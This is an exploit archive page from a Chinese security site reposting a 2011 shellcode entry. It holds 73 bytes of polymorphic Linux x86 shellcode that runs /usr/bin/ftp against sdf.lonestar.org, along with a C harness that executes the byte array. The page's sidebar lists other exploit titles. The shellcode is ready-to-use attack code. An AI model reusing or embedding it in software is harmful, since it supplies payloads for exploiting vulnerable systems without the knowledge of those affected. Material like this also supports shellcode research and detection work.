首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
73 bytes sys_execve("/usr/bin/ftp", "sdf.lonestar.org", NULL)
来源:http://1337day.com 作者:Paulus 发布时间:2011-10-26  
/* 73 bytes sys_execve("/usr/bin/ftp", "sdf.lonestar.org", NULL)
 * polymorphic shellcode
 * Tested On : Debian Squeeze 6.02 (Linux x86-based OS)
 * Programmer : Paulus Gandung Prakosa_ (0x1337day)
 * Thanks to : mywisdom, chaer.newbie, wenkhairu, ketek, gunslinger_,
 *             nofia_fitri, xtr0nic, t3k0, tabun, petimati, and all
 *             devilzc0de member
 */

#include <stdio.h>
#include <string.h>

char sdf_ftp[] = "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x2e"
                 "\x6f\x72\x67\x68\x73\x74\x61\x72\x68\x6c"
                 "\x6f\x6e\x65\x68\x73\x64\x66\x2e\x89\xe6"
                 "\x83\xec\x01\x88\x04\x24\x68\x2f\x66\x74"
                 "\x70\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73"
                 "\x72\x50\x56\x83\xee\x0d\x56\xb0\x0b\x89"
                 "\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31"
                 "\xdb\xcd\x80";

int main(void)
{
	int ftp_len = strlen(sdf_ftp);
	fprintf(stdout, "[+] Length of the shellcode is : %d bytes\n", ftp_len);
	((void(*)(void))sdf_ftp)();

	return 0;
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SAP Management Console OSExecu
·Reggae player (.ogg) Local BOF
·phpLDAPadmin <= 1.2.1.1 (query
·phpScheduleIt PHP reserve.php
·BlueZone Desktop Multiple Malf
·GTA SA-MP server.cfg Buffer Ov
·Linux 2.6.3* x86_64 2010 local
·Advanced MP3 Manager 1.x Local
·Xorg Permission Change
·Nextwebstudio Denial of Servic
·GFI Faxmaker - Fax Viewer v10.
·FTP Voyager Remote Crash Explo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved